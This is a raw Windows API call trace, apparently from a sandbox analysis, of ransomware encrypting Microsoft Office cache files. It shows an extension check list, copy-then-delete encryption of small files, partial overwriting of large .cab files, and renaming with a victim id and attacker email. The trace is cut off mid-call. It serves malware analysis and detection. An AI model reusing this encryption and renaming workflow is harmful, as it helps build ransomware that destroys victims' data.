[0048.687] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.687] lstrlenW (lpString=".docx") returned 5 [0048.687] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.687] lstrlenW (lpString=".pdf") returned 4 [0048.687] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.687] lstrlenW (lpString=".xls") returned 4 [0048.687] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.687] lstrlenW (lpString=".xlsx") returned 5 [0048.687] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.687] lstrlenW (lpString=".ppt") returned 4 [0048.688] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.688] lstrlenW (lpString=".zip") returned 4 [0048.688] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.688] lstrlenW (lpString=".rar") returned 4 [0048.688] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.688] lstrlenW (lpString=".bz2") returned 4 [0048.688] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.688] lstrlenW (lpString=".7z") returned 3 [0048.688] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.688] lstrlenW (lpString=".dbf") returned 4 [0048.688] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.688] lstrlenW (lpString=".1cd") returned 4 [0048.688] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.688] lstrlenW (lpString=".jpg") returned 4 [0048.688] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.688] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0048.688] lstrlenW (lpString="PidGenX.dll") returned 11 [0048.688] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0048.688] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=1463568) returned 1 [0048.688] CloseHandle (hObject=0x1f4) returned 1 [0048.689] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0048.689] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.689] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0048.689] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.689] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.689] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0048.689] GetLastError () returned 0x0 [0048.689] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0048.728] WriteFile (in: hFile=0x228, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0048.985] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x65520, lpOverlapped=0x0) returned 1 [0048.997] WriteFile (in: hFile=0x228, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0049.006] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.006] WriteFile (in: hFile=0x228, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.006] SetEndOfFile (hFile=0x228) returned 1 [0049.006] CloseHandle (hObject=0x228) returned 1 [0049.006] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.006] SetEndOfFile (hFile=0x1f4) returned 1 [0049.010] CloseHandle (hObject=0x1f4) returned 1 [0049.010] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0049.010] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0049.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.158] lstrlenW (lpString=".doc") returned 4 [0049.158] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.158] lstrlenW (lpString=".docx") returned 5 [0049.158] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0049.158] lstrlenW (lpString=".pdf") returned 4 [0049.158] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.158] lstrlenW (lpString=".xls") returned 4 [0049.158] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.158] lstrlenW (lpString=".xlsx") returned 5 [0049.158] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0049.158] lstrlenW (lpString=".ppt") returned 4 [0049.158] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.158] lstrlenW (lpString=".zip") returned 4 [0049.159] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.159] lstrlenW (lpString=".rar") returned 4 [0049.159] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.159] lstrlenW (lpString=".bz2") returned 4 [0049.159] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.159] lstrlenW (lpString=".7z") returned 3 [0049.159] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.159] lstrlenW (lpString=".dbf") returned 4 [0049.159] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.159] lstrlenW (lpString=".1cd") returned 4 [0049.159] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.159] lstrlenW (lpString=".jpg") returned 4 [0049.159] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.159] lstrlenW (lpString=".doc") returned 4 [0049.159] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.159] lstrlenW (lpString=".docx") returned 5 [0049.159] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0049.159] lstrlenW (lpString=".pdf") returned 4 [0049.159] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.159] lstrlenW (lpString=".xls") returned 4 [0049.159] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.159] lstrlenW (lpString=".xlsx") returned 5 [0049.159] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0049.159] lstrlenW (lpString=".ppt") returned 4 [0049.159] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.159] lstrlenW (lpString=".zip") returned 4 [0049.160] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.160] lstrlenW (lpString=".rar") returned 4 [0049.160] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.160] lstrlenW (lpString=".bz2") returned 4 [0049.160] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.160] lstrlenW (lpString=".7z") returned 3 [0049.160] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.160] lstrlenW (lpString=".dbf") returned 4 [0049.160] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.160] lstrlenW (lpString=".1cd") returned 4 [0049.160] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.160] lstrlenW (lpString=".jpg") returned 4 [0049.160] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.160] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0049.160] lstrlenW (lpString="ProPrWW2.cab") returned 12 [0049.160] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0050.196] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=222948913) returned 1 [0050.196] CloseHandle (hObject=0x1f4) returned 1 [0050.196] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab")) returned 0x2020 [0050.196] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.196] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0050.197] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0050.197] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0050.197] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.197] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.204] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.205] ReadFile (in: hFile=0x1f4, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.211] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0050.211] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.211] ReadFile (in: hFile=0x1f4, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.226] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.227] WriteFile (in: hFile=0x1f4, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0050.409] SetEndOfFile (hFile=0x1f4) returned 1 [0050.683] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0050.753] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.753] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.754] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.754] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.756] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.756] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.758] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0050.758] CloseHandle (hObject=0x1f4) returned 1 [0050.758] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0050.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.759] lstrlenW (lpString=".doc") returned 4 [0050.759] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.759] lstrlenW (lpString=".docx") returned 5 [0050.759] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1 [0050.759] lstrlenW (lpString=".pdf") returned 4 [0050.759] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.759] lstrlenW (lpString=".xls") returned 4 [0050.759] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.759] lstrlenW (lpString=".xlsx") returned 5 [0050.759] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1 [0050.759] lstrlenW (lpString=".ppt") returned 4 [0050.759] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.759] lstrlenW (lpString=".zip") returned 4 [0050.759] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.759] lstrlenW (lpString=".rar") returned 4 [0050.759] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.759] lstrlenW (lpString=".bz2") returned 4 [0050.759] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.759] lstrlenW (lpString=".7z") returned 3 [0050.759] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.759] lstrlenW (lpString=".dbf") returned 4 [0050.759] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.759] lstrlenW (lpString=".1cd") returned 4 [0050.759] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.759] lstrlenW (lpString=".jpg") returned 4 [0050.759] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.760] lstrlenW (lpString=".doc") returned 4 [0050.760] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.760] lstrlenW (lpString=".docx") returned 5 [0050.760] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1 [0050.760] lstrlenW (lpString=".pdf") returned 4 [0050.760] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.760] lstrlenW (lpString=".xls") returned 4 [0050.760] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.760] lstrlenW (lpString=".xlsx") returned 5 [0050.760] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1 [0050.760] lstrlenW (lpString=".ppt") returned 4 [0050.760] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.760] lstrlenW (lpString=".zip") returned 4 [0050.760] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.760] lstrlenW (lpString=".rar") returned 4 [0050.760] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.760] lstrlenW (lpString=".bz2") returned 4 [0050.760] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.760] lstrlenW (lpString=".7z") returned 3 [0050.760] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.760] lstrlenW (lpString=".dbf") returned 4 [0050.760] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.760] lstrlenW (lpString=".1cd") returned 4 [0050.760] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0050.760] lstrlenW (lpString=".jpg") returned 4 [0050.760] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.761] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0050.761] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0050.761] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0051.986] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=36233052) returned 1 [0051.986] CloseHandle (hObject=0x1f4) returned 1 [0051.986] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0051.986] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0051.986] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0051.987] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0051.987] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0051.987] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.987] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.993] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.993] ReadFile (in: hFile=0x1f4, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.997] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0051.997] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.997] ReadFile (in: hFile=0x1f4, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.013] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.013] WriteFile (in: hFile=0x1f4, 